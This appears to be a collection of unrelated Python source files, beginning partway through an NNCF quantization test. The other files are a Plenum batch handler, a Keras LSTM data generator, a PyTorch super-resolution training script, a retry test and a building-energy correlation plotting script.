return super().__str__() + '_autoq' + sr + dd
class AutoQSampleValidator(PrecisionSampleValidator):
def __init__(self, desc: AutoQTestCaseDescriptor):
super().__init__(desc)
self._desc = desc
self.builder_spy = None
def setup_spy(self, mocker):
super().setup_spy(mocker)
from nncf.torch.quantization.algo import QuantizationBuilder
self.builder_spy = mocker.spy(QuantizationBuilder, 'build_controller')
def validate_spy(self):
super().validate_spy()
ctrl = self.builder_spy.spy_return
final_bits = [qm.num_bits for qm in ctrl.all_quantizations.values()]
assert set(final_bits) != {QuantizerConfig().num_bits}
assert all(bit in self._desc.BITS for bit in final_bits)
def resnet18_desc(x: PrecisionTestCaseDescriptor):
return x.config_name("resnet18_cifar10_mixed_int.json").sample_type(SampleType.CLASSIFICATION). \
mock_dataset('mock_32x32').batch_size(3).num_weight_quantizers(21).num_activation_quantizers(27)
def inception_v3_desc(x: PrecisionTestCaseDescriptor):
return x.config_name("inception_v3_cifar10_mixed_int.json").sample_type(SampleType.CLASSIFICATION). \
mock_dataset('mock_32x32').batch_size(3).num_weight_quantizers(95).num_activation_quantizers(105)
def ssd300_vgg_desc(x: PrecisionTestCaseDescriptor):
return x.config_name("ssd300_vgg_voc_mixed_int.json").sample_type(SampleType.OBJECT_DETECTION). \
mock_dataset('voc').batch_size(3).num_weight_quantizers(35).num_activation_quantizers(27)
def unet_desc(x: PrecisionTestCaseDescriptor):
return x.config_name("unet_camvid_mixed_int.json").sample_type(SampleType.SEMANTIC_SEGMENTATION). \
mock_dataset('camvid').batch_size(3).num_weight_quantizers(23).num_activation_quantizers(23)
def icnet_desc(x: PrecisionTestCaseDescriptor):
return x.config_name("icnet_camvid_mixed_int.json").sample_type(SampleType.SEMANTIC_SEGMENTATION). \
mock_dataset('camvid').batch_size(3).num_weight_quantizers(64).num_activation_quantizers(81)
TEST_CASE_DESCRIPTORS = [
inception_v3_desc(HAWQTestCaseDescriptor()),
inception_v3_desc(HAWQTestCaseDescriptor()).sample_type(SampleType.CLASSIFICATION_STAGED),
resnet18_desc(HAWQTestCaseDescriptor()),
resnet18_desc(HAWQTestCaseDescriptor()).sample_type(SampleType.CLASSIFICATION_STAGED),
resnet18_desc(HAWQTestCaseDescriptor().batch_size_init(2)),
resnet18_desc(HAWQTestCaseDescriptor().batch_size_init(2)).sample_type(SampleType.CLASSIFICATION_STAGED),
ssd300_vgg_desc(HAWQTestCaseDescriptor()),
ssd300_vgg_desc(HAWQTestCaseDescriptor().batch_size_init(2)),
unet_desc(HAWQTestCaseDescriptor()),
unet_desc(HAWQTestCaseDescriptor().batch_size_init(2)),
icnet_desc(HAWQTestCaseDescriptor()),
inception_v3_desc(AutoQTestCaseDescriptor()).batch_size(2),
inception_v3_desc(AutoQTestCaseDescriptor()).sample_type(SampleType.CLASSIFICATION_STAGED),
resnet18_desc(AutoQTestCaseDescriptor()).batch_size(2),
resnet18_desc(AutoQTestCaseDescriptor().dump_debug(True)).batch_size(2).sample_type(
SampleType.CLASSIFICATION_STAGED),
resnet18_desc(AutoQTestCaseDescriptor().subset_ratio(0.2)).batch_size(2),
resnet18_desc(AutoQTestCaseDescriptor().subset_ratio(0.2)).sample_type(SampleType.CLASSIFICATION_STAGED),
ssd300_vgg_desc(AutoQTestCaseDescriptor().dump_debug(True)).batch_size(2),
unet_desc(AutoQTestCaseDescriptor().dump_debug(True)),
icnet_desc(AutoQTestCaseDescriptor())
]
@pytest.fixture(name='precision_desc', params=TEST_CASE_DESCRIPTORS, ids=map(str, TEST_CASE_DESCRIPTORS))
def fixture_precision_desc(request, dataset_dir):
desc: PrecisionTestCaseDescriptor = request.param
return desc.finalize(dataset_dir)
def test_precision_init(precision_desc: PrecisionTestCaseDescriptor, tmp_path, mocker):
validator = precision_desc.get_validator()
args = validator.get_default_args(tmp_path)
validator.validate_sample(args, mocker)
class ExportTestCaseDescriptor(PrecisionTestCaseDescriptor):
def get_validator(self):
return ExportSampleValidator(self)
def get_precision_section(self) -> Dict:
return {}
def get_sample_params(self):
result = super().get_sample_params()
result.update({'pretrained': True})
return result
class ExportSampleValidator(PrecisionSampleValidator):
def __init__(self, desc: ExportTestCaseDescriptor):
super().__init__(desc)
self._desc = desc
self.is_export_called = False
self._ctrl_mock = None
self._reg_init_args_patch = None
self._create_compressed_model_patch = None
def setup_spy(self, mocker):
super().setup_spy(mocker)
self._reg_init_args_patch = mocker.spy(NNCFConfig, "register_extra_structs")
sample_location = self._sample_handler.get_sample_location()
if self._desc.sample_type_ == SampleType.OBJECT_DETECTION:
mocker.patch(sample_location + '.build_ssd')
else:
load_model_location = sample_location + '.load_model'
mocker.patch(load_model_location)
ctrl_mock = mocker.MagicMock(spec=QuantizationController)
model_mock = mocker.MagicMock(spec=nn.Module)
create_model_location = sample_location + '.create_compressed_model'
create_model_patch = mocker.patch(create_model_location)
if self._desc.sample_type_ == SampleType.CLASSIFICATION_STAGED:
mocker.patch(sample_location + '.get_quantization_optimizer')
def fn(*args, **kwargs):
return ctrl_mock, model_mock
create_model_patch.side_effect = fn
self._ctrl_mock = ctrl_mock
def validate_spy(self):
super().validate_spy()
self._reg_init_args_patch.assert_called()
if self.is_export_called:
self._ctrl_mock.export_model.assert_called_once()
else:
self._ctrl_mock.export_model.assert_not_called()
EXPORT_TEST_CASE_DESCRIPTORS = [
resnet18_desc(ExportTestCaseDescriptor()),
resnet18_desc(ExportTestCaseDescriptor()).sample_type(SampleType.CLASSIFICATION_STAGED),
ssd300_vgg_desc(ExportTestCaseDescriptor()),
unet_desc(ExportTestCaseDescriptor()),
]
@pytest.fixture(name='export_desc', params=EXPORT_TEST_CASE_DESCRIPTORS, ids=map(str, EXPORT_TEST_CASE_DESCRIPTORS))
def fixture_export_desc(request):
desc: PrecisionTestCaseDescriptor = request.param
return desc.finalize()
@pytest.mark.parametrize(
('extra_args', 'is_export_called'),
(
({}, False),
({"-m": 'export train'}, True)
),
ids=['train_with_onnx_path', 'export_after_train']
)
def test_export_behavior(export_desc: PrecisionTestCaseDescriptor, tmp_path, mocker, extra_args, is_export_called):
validator = export_desc.get_validator()
args = validator.get_default_args(tmp_path)
args["--to-onnx"] = tmp_path / 'model.onnx'
if extra_args is not None:
args.update(extra_args)
validator.is_export_called = is_export_called
validator.validate_sample(args, mocker)
|
498197 | from plenum.common.constants import DOMAIN_LEDGER_ID
from plenum.server.batch_handlers.batch_request_handler import BatchRequestHandler
from plenum.server.database_manager import DatabaseManager
from plenum.test.plugin.demo_plugin import AUCTION_LEDGER_ID
class AuctionBatchHandler(BatchRequestHandler):
def __init__(self, database_manager: DatabaseManager):
super().__init__(database_manager, AUCTION_LEDGER_ID)
def post_batch_applied(self, three_pc_batch, prev_handler_result=None):
pass
def post_batch_rejected(self, ledger_id, prev_handler_result=None):
pass
|
498213 | import logging
import numpy
from keras.layers import np
from keras.utils import Sequence
import utils
import utils_logging
from utils import IMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_CHANNELS
FRAME_INTERVAL = 15
logger = logging.Logger("LstmImgBatchGenerator")
utils_logging.log_info(logger)
class LstmImgBatchGenerator(Sequence):
def __init__(self, x_paths_to_pictures, y_paths_to_pictures, data_dir: str, sequence_length: int, gray_scale: bool):
self.data_dir = data_dir
logger.warning("Using hard-coded batch size in lstm img batch generator")
self.batch_size = 4
self.x_paths_to_pictures = x_paths_to_pictures
self.y_paths_to_pictures = y_paths_to_pictures
self.sequence_length = sequence_length
self.gray_scale= gray_scale
def __getitem__(self, index):
start_index = index * self.batch_size
end_index = start_index + self.batch_size
this_batch_x_paths = self.x_paths_to_pictures[start_index:end_index]
this_batch_y_paths = self.y_paths_to_pictures[start_index:end_index]
assert this_batch_x_paths.size == this_batch_y_paths.size
assert this_batch_x_paths[0][1] == this_batch_y_paths[0][0]
x_images = self.empty_batch_array(this_batch_x_paths)
for i, paths in enumerate(this_batch_x_paths):
x = self.load_paths_to_images(paths=paths)
x_images[i] = x
y_images = self.empty_batch_array(this_batch_y_paths)
for i, paths in enumerate(this_batch_y_paths):
x = x_images[i]
x_sublist = x[1:]
last_y = paths[len(paths)-1]
last_img = self.load_paths_to_images(numpy.asarray([last_y]))
y = numpy.concatenate((x_sublist, last_img))
assert len(x) == len(y)
y_images[i] = y
assert numpy.array_equal(x_images[0][1], y_images[0][0])
return x_images, y_images
def empty_batch_array(self, this_batch_y_paths):
return np.empty([len(this_batch_y_paths), self.sequence_length, IMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_CHANNELS])
def load_paths_to_images(self, paths):
images = np.empty([len(paths), IMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_CHANNELS])
for k, path in enumerate(paths):
images[k] = utils.load_img_from_path(data_dir=self.data_dir,
image_name=path,
is_gray_scale=self.gray_scale)
return images
def get_single_sequence(self, index):
x = self.x_paths_to_pictures[index]
x_imgs = []
x_imgs.append(self.load_paths_to_images(x))
x_imgs = numpy.array(x_imgs)
# Low performance implementation, but this is not relevant as we're only using the method for manual check
y = self.y_paths_to_pictures[index]
y_imgs = self.load_paths_to_images(y)
assert len(y_imgs) == self.sequence_length
next_image = y_imgs[self.sequence_length - 1]
return x_imgs, next_image
def __len__(self):
return (len(self.x_paths_to_pictures ) - FRAME_INTERVAL)// self.batch_size
def get_batch_size(self):
return self.batch_size
|
498255 | from __future__ import print_function
import os
import time
from datetime import datetime
import math
import argparse
import logging
import pickle
import yaml
import cv2 as cv
import numpy as np
# from skimage.measure.simple_metrics import compare_psnr
import torch
import torch.nn as nn
import torch.optim as optim
import torch.backends.cudnn as cudnn
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
from data.youku import SISRDataset
from model.WDSR_A import MODEL
from models.modules.RRDBNet_arch import RRDBNet
# Training settings
parser = argparse.ArgumentParser(description='PyTorch Super Res Example')
parser.add_argument('--yaml_path', type=str, default="./settings.yaml", help='配置文件路径')
args = parser.parse_args()
with open(args.yaml_path, 'r') as yf:
opt = yaml.load(yf)
cudnn.benchmark = True
cuda = opt['hardware']['cuda']
logger = logging.getLogger('base')
print(opt)
if cuda and not torch.cuda.is_available():
raise Exception("No GPU found, please run without --cuda")
torch.manual_seed(opt['hardware']['seed'])
if cuda:
torch.cuda.manual_seed(opt['hardware']['seed'])
device = torch.device("cuda" if cuda else "cpu")
now = datetime.now()
label = f"{opt['model']}-C{opt['channel']}-R{opt[opt['model']]['n_resblocks']}F{opt[opt['model']]['n_feats']}"
tb_dir = f"{opt['log_dir']}/{now.strftime('%m%d-%H%M-')}{label}/"
print('===> Loading dataset')
train_set = SISRDataset(data_dir=opt['data_dir'], augment=opt['augment'],
patch_size=opt['patch_size'], v_freq=opt['vFreq'],
preload=opt['preload'], norm=False)
data_loader = DataLoader(dataset=train_set, num_workers=opt['hardware']['threads'],
batch_size=opt['batch_size'], shuffle=True)
eval_set = SISRDataset(data_dir=opt['eval_dir'], augment=opt['augment'],
patch_size=0, v_freq=5)
eval_loader = DataLoader(dataset=eval_set, num_workers=opt['hardware']['threads'],
shuffle=True)
print('===> Building model')
if opt['model'] == 'WDSR':
if opt['channel'] == 3:
model = MODEL(cuda, n_res=opt['WDSR']['n_resblocks'], n_feats=opt['WDSR']['n_feats'],
res_scale=opt['WDSR']['res_scale'], n_colors=3, block_feats=opt['WDSR']['block_feats'],
mean=opt['mean']).to(device)
else:
model = MODEL(cuda, n_res=opt['WDSR']['n_resblocks'], n_feats=opt['WDSR']['n_feats'],
res_scale=opt['WDSR']['res_scale'],
n_colors=1, mean=[opt['mean'][opt['channel']]]).to(device)
elif opt['model'] == 'RRDB':
model = RRDBNet(3, 3, opt['RRDB']['n_feats'], opt['RRDB']['n_resblocks']).to(device)
else:
model = None
criterion = nn.L1Loss().to(device)
optimizer = optim.Adam(model.parameters(), lr=opt['lr'])
# optimizer = Nadam(model.parameters(), lr=0.00001)
# optimizer = optim.SGD(model.parameters(), lr=opt['lr'], momentum=0.9, weight_decay=1e-4, nesterov=True)
re_avgpool = torch.nn.AvgPool2d((2, 2), stride=(2, 2))
if opt['pre_trained'] and os.path.exists(opt['pre_train_path']):
model.load_state_dict(torch.load(opt['pre_train_path'], map_location=lambda storage, loc: storage))
# with open(f"{opt['save_dir']}/optim.pkl", 'rb') as f:
# optimizer = pickle.load(f)
print('Pre-trained SR model is loaded.')
def get_ch(img: torch.Tensor, channel: int):
if channel == 0: # Y通道
return img.index_select(1, torch.LongTensor([channel])).to(device)
elif 3 > channel > 0: # U和V
return re_avgpool(img.index_select(1, torch.LongTensor([channel]))).to(device)
elif channel == 3: # 444
return img.to(device)
def out_rgb(img, path):
img = img.cpu().squeeze(0).numpy().astype(np.uint8).transpose((1,2,0))
if opt['channel'] < 3:
img = img[0]
elif opt['rgb'] == False:
img = cv.cvtColor(img, cv.COLOR_YUV2RGB)
cv.imwrite(path, img)
return
def train(e):
print(f"===> Epoch {e} Begin: LR: {optimizer.param_groups[0]['lr']}")
epoch_loss = 0
model.train()
for batch_i, batch in enumerate(data_loader):
t0 = time.time()
lr, gt = get_ch(batch[0], opt['channel']), get_ch(batch[1], opt['channel'])
optimizer.zero_grad()
loss = criterion(model(lr), gt)
epoch_loss += loss.item()
loss.backward()
optimizer.step()
t1 = time.time()
# 每10个batch画个点用于loss曲线
if batch_i % 10 == 0:
print(f"===> Epoch[{e}]({batch_i}/{len(data_loader)}):",
f" Loss: {loss.item():.4f} || Timer: {(t1 - t0):.4f} sec.")
niter = (epoch * len(data_loader) + batch_i) * opt['batch_size']
with SummaryWriter(log_dir=tb_dir, comment='WDSR')as w:
w.add_scalar('Train/Loss', loss.item(), niter)
avg_loss = epoch_loss / len(data_loader)
with SummaryWriter(log_dir=tb_dir, comment='WDSR')as w:
w.add_scalar('Train/lr', optimizer.param_groups[0]['lr'], e)
w.add_scalar('Train/epoch_Loss', avg_loss, e)
print(f"===> Epoch {e} Complete: Avg. Loss: {avg_loss:.4f}")
return
def eval_func(e, only=False):
epoch_loss = 0
avg_psnr = 0
if opt['pre_trained'] and only:
model.load_state_dict(torch.load(opt['pre_train_path']))
model.eval()
for batch_i, batch in enumerate(eval_loader):
t0 = time.time()
lr, gt = get_ch(batch[0], opt['channel']).to(device), get_ch(batch[1], opt['channel']).to(device)
with torch.no_grad():
sr = model(lr)
_psnr = psnr_tensor(sr, gt)
loss = criterion(sr, gt)
t1 = time.time()
epoch_loss += loss.item()
avg_psnr += _psnr
if batch_i % 20 == 0:
out_rgb(lr, f"/data/evi/{opt['channel']}_{e}_{batch_i}_lr.png")
out_rgb(sr, f"/data/evi/{opt['channel']}_{e}_{batch_i}_sr.png")
out_rgb(gt, f"/data/evi/{opt['channel']}_{e}_{batch_i}_gt.png")
print(f"===> eval({batch_i}/{len(eval_loader)}): PSNR: {_psnr:.4f}",
f" Loss: {loss.item():.4f} || Timer: {(t1 - t0):.4f} sec.")
avg_psnr /= len(eval_loader)
avg_loss = epoch_loss / len(eval_loader)
print(f"===> eval Complete: Avg PSNR: {avg_psnr}, Avg. Loss: {avg_loss:.4f}")
with SummaryWriter(log_dir=tb_dir, comment='WDSR')as w:
w.add_scalar('eval/PSNR', avg_psnr, epoch)
w.add_scalar('eval/LOSS', avg_loss, epoch)
return avg_psnr
def psnr_tensor(img1: torch.Tensor, img2: torch.Tensor):
# img1 and img2 have range [0, 255]
diff = img1 - img2
mse = torch.mean(diff * diff).item()
if mse == 0:
return float('inf')
return 10 * math.log10(65025.0 / mse)
def checkpoint(comment=""):
global opt
save_path = f"{opt['save_dir']}/{opt['scale']}x_{comment}_{epoch}.pth"
torch.save(model.state_dict(), save_path)
with open(args.yaml_path, 'r') as f:
opt = yaml.load(f)
opt['pre_train_path'] = save_path
opt['pre_trained'] = True
opt['startEpoch'] = epoch + 1
# with open(f"{opt['save_dir']}/optim.pkl", 'wb') as f:
# pickle.dump(optimizer, f)
with open(args.yaml_path, 'w') as f:
f.write(yaml.dump(opt))
print(f"Checkpoint saved to {save_path}")
doEval = opt['only_eval']
if doEval:
eval_func(-1, opt['only_eval'])
else:
for epoch in range(opt['startEpoch'], opt['nEpochs'] + 1):
train(epoch)
if (epoch + 1) % opt['snapshots'] == 0:
checkpoint(label)
eval_func(epoch)
if (epoch + 1) in opt['lr_step']:
for param_group in optimizer.param_groups:
param_group['lr'] /= 10.0
# 脚本退出后存储配置
with open(args.yaml_path, 'w') as yf:
yf.write(yaml.dump(opt))
os.system("bash /root/shutdown.sh")
"""
需要调节的:
- n_resblocks = 16
- n_feats = 64
- 三个通道均值 mean 从数据中来
- lr 的更新
- batch size
- patch size
- v freq 每个视频每epoch抽帧次数
"""
|
498269 | class GuetError(Exception):
pass
class InvalidInitialsError(GuetError):
pass
class UnexpectedError(GuetError):
pass
|
498300 | from anyapi import AnyAPI
from anyapi.utils import retry
from requests.exceptions import MissingSchema
import pytest
def test_retry():
"""Test retry utility"""
# I know that I should test retry and retry_until separately
# But I couldn't find any idea to test retry_until separately
try:
invalid_api = AnyAPI("invalidurl", scoped_calls=[retry(2)])
invalid_api.GET()
except MissingSchema:
assert True
else:
assert False
|
498317 | import re
import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm #color map
import getpass
import seaborn as sns
from scipy.stats import spearmanr, pearsonr, sem
import itertools
import matplotlib.ticker as ticker
# import statsmodels.api as sm
def main():
BuildingList = ['05_MaletPlaceEngineering', '01_CentralHouse', '02_BuroHappold_17', '03_BuroHappold_71'] # Location of DATA
BuildingHardDisk = ['05_MaletPlaceEngineering_Project', '01_CentralHouse_Project', '02_BuroHappold_17','03_BuroHappold_71']
DataFilePaths = ['MPEB', 'CentralHouse', '17', '71'] # Location of STM data and file naming
BuildingLabels = ['MPEB', 'CH', 'Office 17', 'Office 71']
BuildingAbbreviations = ['MPEB', 'CH', '17', '71', 'Nothing']
InputVariables = ['inputs_MaletPlace_FINAL.csv', 'inputs_CentralHouse_222_29_11_15_02_2870.csv', 'Inputs.csv', 'inputs_BH71_27_09_13_46.csv']
FloorAreas = [9579, 5876, 1924, 1691]
NO_ITERATIONS = [3000, 2870, 100, 100]
building_num = 1 # 0 = MPEB, 1 = CH, 2 = 17, 3 = 71
time_step = 'year' # month or year
building_abr = BuildingAbbreviations[building_num]
datafile = DataFilePaths[building_num]
building_label = BuildingLabels[building_num]
floor_area = FloorAreas[building_num]
building_harddisk = BuildingHardDisk[building_num]
NO_ITERATIONS = NO_ITERATIONS[building_num]
inputs = InputVariables[building_num]
parallel_runs_harddisk = start_path + 'OneDrive - BuroHappold\EngD_hardrive backup/UCL_DemandLogic/' + building_harddisk + '/ParallelSimulation/Eplusmtr/'
DataPath_model_real = start_path + 'OneDrive - BuroHappold\EngD_hardrive backup/UCL_DemandLogic/' + building_harddisk + '/ParallelSimulation/'
DataPathImages = start_path + 'OneDrive - BuroHappold/01 - EngD/01 - Thesis/02_Images/'
to_hdf = False
if to_hdf:
runs_outputs = readRuns(parallel_runs_harddisk, time_step=time_step, NO_ITERATIONS=NO_ITERATIONS)
print(runs_outputs.head())
runs_outputs.to_hdf(DataPath_model_real + building_abr+ '_' + str(NO_ITERATIONS) +'_RUNS_' + time_step + '.hdf', 'runs', mode='w')
runs_outputs = pd.read_hdf(DataPath_model_real + building_abr+ '_' + str(NO_ITERATIONS) +'_RUNS_' + time_step + '.hdf', 'runs')
Y_real = runs_outputs.as_matrix()
cols_outputs = runs_outputs.columns.tolist()
runs_inputs = readInputs(DataPath_model_real, parallel_runs_harddisk, inputs, NO_ITERATIONS)
X_real = runs_inputs.as_matrix()
cols_inputs = runs_inputs.columns.tolist()
# X_real_data = np.vstack((cols_inputs, X_real))
# Y_real_data = np.vstack((cols_outputs, Y_real))
#input_outputs = np.hstack((X_real_data, Y_real_data))
#pd.DataFrame(input_outputs).to_csv(DataPath_model_real + 'input_outputs_' + time_step + '.csv', header=None)
df_corr_stnd, df_corr_spearman, df_corr_pearson = calculateCorrelations(DataPath_model_real, X_real, Y_real, cols_outputs, cols_inputs)
#heatmapCorrelations(df_corr_pearson, runs_outputs, DataPathImages)
#scatterCorrelation(runs_inputs[['WeekdayLandPsched_Offset']], runs_outputs[['Cooling']]/floor_area, input_label='L&P profile offset (per 30Min)', output_label='Cooling $\mathregular{(kWh/m^{2}a)}$', DataPathImages)
boxplotPredictions(runs_outputs/floor_area, time_step, DataPathImages)
plt.show()
def calculateCorrelations(DataPath_model_real, X_real, Y_real, cols_outputs, cols_inputs):
cols_outputs.append('Total')
Y_real = pd.DataFrame(pd.concat([pd.DataFrame(Y_real), pd.DataFrame(Y_real.sum(axis=1), columns=['Total'])], axis=1))
Y_real = Y_real.as_matrix()
print('no. variables', len(cols_inputs))
print('cols_outputs', cols_outputs)
label = ['Standardized', 'Spearman', 'Pearson']
for p, q in enumerate(label):
df_corr = pd.DataFrame(cols_inputs)
df_corr.columns = [q]
for j in range(Y_real.shape[1]):
coef_list = []
for i in range(X_real.shape[1]):
if p == 0:
# coef_list.append(sm.OLS(zscore(X_real[:, i]), zscore(Y_real.iloc[:, j])).fit().params[0])
#print('install statsmodels')
continue
elif p == 1:
coef_list.append(spearmanr(X_real[:, i], Y_real[:, j])[0])
elif p == 2:
coef_list.append(pearsonr(X_real[:, i], Y_real[:, j])[0])
df_corr[cols_outputs[j]] = pd.Series(coef_list) # append list to df
df_corr.set_index(q, inplace=True)
if p == 0:
df_corr_stnd = df_corr
elif p == 1:
df_corr_spearman = df_corr
elif p == 2:
df_corr_pearson = df_corr
return df_corr_stnd, df_corr_spearman, df_corr_pearson
def scatterCorrelation(df_inputs, df_outputs, input_label, output_label, DataPathImages):
df_in = df_inputs.columns.tolist()
df_out = df_outputs.columns.tolist()
for i, v in enumerate(range(len(df_in))):
input = df_inputs[df_in[i]]
output = df_outputs[df_out[i]]
fig = plt.figure(figsize=(6/ 2.54, 6 / 2.54))
ax = fig.add_subplot(111)
reorder = sorted(range(len(input)), key = lambda ii: input[ii])
xd = [input[ii] for ii in reorder]
yd = [output[ii] for ii in reorder]
par = np.polyfit(xd, yd, 1, full=True)
slope=par[0][0]
intercept=par[0][1]
xl = [min(xd), max(xd)]
yl = [slope*xx + intercept for xx in xl]
# coefficient of determination, plot text
variance = np.var(yd)
residuals = np.var([(slope*xx + intercept - yy) for xx,yy in zip(xd,yd)])
Rsqr = np.round(1-residuals/variance, decimals=2)
# error bounds
yerr = [abs(slope*xx + intercept - yy) for xx,yy in zip(xd,yd)]
par = np.polyfit(xd, yerr, 2, full=True)
yerrUpper = [(xx*slope+intercept)+(par[0][0]*xx**2 + par[0][1]*xx + par[0][2]) for xx,yy in zip(xd,yd)]
yerrLower = [(xx*slope+intercept)-(par[0][0]*xx**2 + par[0][1]*xx + par[0][2]) for xx,yy in zip(xd,yd)]
ax.plot(xl, yl, '-', color=colors[1])
ax.plot(xd, yerrLower, '--', color=colors[1])
ax.plot(xd, yerrUpper, '--', color=colors[1])
max_dots = 500
ax.scatter(df_inputs[df_in[i]][:max_dots], df_outputs[df_out[i]][:max_dots], alpha=.8)
#ax.plot(x, m*x + b, '-')
#ax.set_xlim(0, ),
ax.set_xlabel(input_label)
ax.set_ylabel(output_label)
ax.set_title('$R^2 = %0.2f$'% Rsqr, fontsize=9)
plt.savefig(DataPathImages + '_ScatterSingleVariable.png', dpi=300, bbox_inches='tight')
def boxplotPredictions(runs, time_step, DataPathImages): # for multiple runs
"""
:param runs: Pandas DataFrame of predictions (i.e. combined eplusmtr results)
:param time_step: 'month' or 'year'
:return:
"""
if time_step == 'year':
no_end_uses = len(runs.columns)
fig = plt.figure(figsize=(18 / 2.54, 8 / 2.54)) #width and height
ax2 = plt.subplot2grid((1, no_end_uses+1), (0, 0))
ax = plt.subplot2grid((1, no_end_uses+1), (0, 1), colspan=no_end_uses)
#plot end-uses boxplots
x = np.arange(1, len(runs.columns) + 1)
bplot = runs.iloc[:, :].plot.box(ax=ax, widths=.85, showfliers=False, patch_artist=True, return_type='dict') #showmeans=True
colors_repeat = list(itertools.chain.from_iterable(itertools.repeat(x, 2) for x in colors))
for y in range(runs.shape[0]):
if y < 250: # otherwise it gets too crowded
q = np.random.normal(0, 0.06, size=runs.shape[1])
ax.scatter(x+q, runs.iloc[y, :], edgecolors='r', alpha=0.05, zorder=5, facecolors='none',)
#plot total boxplot
bplot_ax2 = pd.DataFrame(runs.sum(axis=1), columns=['Total']).plot.box(ax=ax2, widths=.85, showfliers=False, patch_artist=True, return_type='dict', )
for y in range(pd.DataFrame(runs.sum(axis=1)).shape[0]):
if y < 500:
q = np.random.normal(0, 0.06)
ax2.scatter(1+q, pd.DataFrame(runs.sum(axis=1)).iloc[y, :], edgecolors='r', alpha=0.1, zorder=5, facecolors='none', )
bplots = [bplot, bplot_ax2]
for bplot in bplots:
[i.set(color=colors[0], linewidth=1.5) for i in bplot['boxes']]
[i.set(facecolor='white') for i in bplot['boxes']]
for key in ['whiskers', 'caps', 'medians']:
for y, box in enumerate(bplot[key]): #set colour of boxes
box.set(color=colors[0], linewidth=1.5)
[i.set(color='black') for i in bplot['medians']]
fig.subplots_adjust(wspace=1)
ax2.set_ylabel('Energy $\mathregular{(kWh/m^{2}a)}$')
ax.yaxis.grid(b=True, which='major', color='black', linestyle='--', alpha=.4)
ax2.yaxis.grid(b=True, which='major', color='black', linestyle='--', alpha=.4)
ax.set_axisbelow(True)
ax2.set_axisbelow(True)
if time_step == 'month':
cols = runs.columns.tolist()
runs_total = runs.sum(axis=1, level=[1]) # sum the months for each end-use
runs_total.columns = pd.MultiIndex.from_product([['Total'], runs_total.columns]) # add new level total and columns
runs = pd.concat([ runs, runs_total], axis=1) #add total to multiindex
print(runs.head())
end_uses = runs.columns.levels[0].tolist()
print(runs[end_uses[0]].columns)
month_list = runs[end_uses[0]].columns.tolist()
ticklabels=month_list
fig, axes = plt.subplots(nrows=len(end_uses), ncols=1, sharey=False, figsize=(18 / 2.54, len(end_uses)*3.5 / 2.54))
end_uses.remove('Total')
end_uses.append('Total') #total to end
for x, y in enumerate(end_uses):
ax = axes[x]
props = dict(boxes=colors[0], whiskers=colors[0], medians='black', caps=colors[0])
runs.xs(y, axis=1).plot.box(ax=ax, color=props, patch_artist=True, showfliers=False) # access highlevel multiindex
#hide month labels for all but last plot
ax.set_ylabel(y)
if x != len(end_uses)-1:
for index, label in enumerate(ax.get_xaxis().get_ticklabels()):
label.set_visible(False)
ax.yaxis.grid(b=True, which='major', color='black', linestyle='--', alpha=.4)
ax.set_axisbelow(True)
axes[0].set_title('Energy $\mathregular{(kWh/m^{2}a)}$', fontsize=9)
axes[len(end_uses)-1].xaxis.set_major_formatter(ticker.FixedFormatter(ticklabels))
plt.savefig(DataPathImages + time_step + '_boxplot.png', dpi=300, bbox_inches='tight')
def heatmapCorrelations(df, runs, DataPathImages):
df_perc_total = [i / runs.mean(axis=0).sum() for i in runs.mean(axis=0)]
df_perc_total.append(1) # for the total, which is 100%
runs = pd.DataFrame(pd.concat([runs, pd.DataFrame(runs.sum(axis=1), columns=['Total'])], axis=1))
cols_outputs = runs.columns.tolist()
df_standard = df.multiply(df_perc_total)
df_standard = (df_standard-df_standard.mean().mean()) / (df_standard.max().max() - df_standard.min().min())
df_index = df[abs(df[abs(df) > .25].count(axis=1) > 0.25)]
df_index_standard = df_standard[abs(df_standard[abs(df_standard) > .25].count(axis=1) > 0.25)]
def f7(seq):
seen = set()
seen_add = seen.add
return [x for x in seq if not (x in seen or seen_add(x))]
df_index = f7(df_index.index.tolist()+df_index_standard.index.tolist())
df = df.loc[df_index]
df_standard = df_standard.loc[df_index]
cols_outputs_add = [v+' ['+str(round(df_perc_total[i]*100,1))+'%]' for i,v in enumerate(cols_outputs)]
heatmap = df.as_matrix(columns=cols_outputs)
fig, ax = plt.subplots(figsize=(10 / 2.54, 12 / 2.54))
use_sns = True
if use_sns is True:
ax = sns.heatmap(heatmap, linewidths=.8, annot=True, cmap='RdBu_r', annot_kws={"size": 6}, fmt='.2f', vmin=-1, vmax=1) #cmap=cm.Spectral_r,
ax.set_yticklabels(df.index, rotation=0) # set y labels ('variables') from index
ax.set_xticklabels(cols_outputs_add, rotation=90) # set y labels ('variables') from index
ax.xaxis.tick_top()
else:
im = ax.matshow(heatmap, cmap='RdBu_r', interpolation='none')
cbar = plt.colorbar(im, fraction=0.04555, pad=0.04)
cbar.ax.tick_params()
ind_x = np.arange(df.shape[1])
ind_y = np.arange(df.shape[0])
ax.set_aspect('equal')
ax.set_yticks(ind_y) # set positions for y-labels, .5 to put the labels in the middle
ax.set_yticklabels(df.index, rotation = 0) # set y labels ('variables') from index
ax.set_yticks(ind_y + .5, minor=True)
ax.set_xticklabels('')
ax.set_xticks(ind_x) # set positions for y-labels, .5 to put the labels in the middle
ax.set_xticklabels(cols_outputs_add, rotation=90) # set y labels ('variables') from index
ax.set_xticks(ind_x + .5, minor=True)
ax.grid(which='minor', linewidth=1, color='white')
ax.grid(False, which='major')
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['bottom'].set_visible(False)
ax.spines['left'].set_visible(False)
# annotating the data inside the heatmap
for y in range(df.shape[0]):
for x in range(df.shape[1]):
plt.text(x, y, '%.2f' % heatmap[y][x],horizontalalignment='center',verticalalignment='center',fontsize=6)
plt.savefig(DataPathImages + '_HeatMapCorrelations.png', dpi=400, bbox_inches='tight')
if __name__ == '__main__':
def start__main__():
print('start')
start__main__()
from read_predictions import readRuns, readInputs
colors = ['#1f77b4', '#ff7f0e', '#2ca02c', '#8c564b', '#d62728', '#9467bd', '#aec7e8', '#ffbb78', '#98df8a',
'#c49c94', '#ff9896', '#c5b0d5', '#1f77b4', '#ff7f0e', '#2ca02c', '#8c564b', '#d62728', '#9467bd',
'#aec7e8', '#ffbb78', '#98df8a', '#c49c94', '#ff9896', '#c5b0d5']
